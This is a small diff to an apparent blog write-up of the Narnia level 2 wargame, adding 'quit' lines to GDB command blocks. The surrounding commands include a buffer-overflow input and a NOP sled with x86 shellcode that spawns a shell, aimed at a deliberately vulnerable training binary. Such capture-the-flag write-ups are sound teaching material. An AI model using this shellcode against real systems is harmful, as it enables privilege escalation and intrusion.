--- a/_posts/2018-06-14-Cybersecurity-GDB.html
+++ b/_posts/2018-06-14-Cybersecurity-GDB.html
@@ -65,6 +65,7 @@ Enter narnia2 with password obtained from Level 1.(Refer <a href="https://karthi
         <code>
         gdb /narnia/narnia2
         (gdb)disas main
+        (gdb) quit
       </code>
       </pre>
       You can see the following snap:
@@ -75,6 +76,7 @@ Enter narnia2 with password obtained from Level 1.(Refer <a href="https://karthi
         <code>
         gdb --args /narnia/narnia2 $(python -c 'print "\x41"*144'
         (gdb) run
+        (gdb) quit
       </code>
       </pre>
 
@@ -85,7 +87,8 @@ Enter narnia2 with password obtained from Level 1.(Refer <a href="https://karthi
         <code>
         gdb --args /narnia/narnia2 $(python -c 'print "\x90"*108+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x00\x00\x00\x00"')
         (gdb) run
-        x/150x $esp
+        (gdb) x/150x $esp
+        (gdb) quit
       </code>
       </pre>
       Snap: <br>
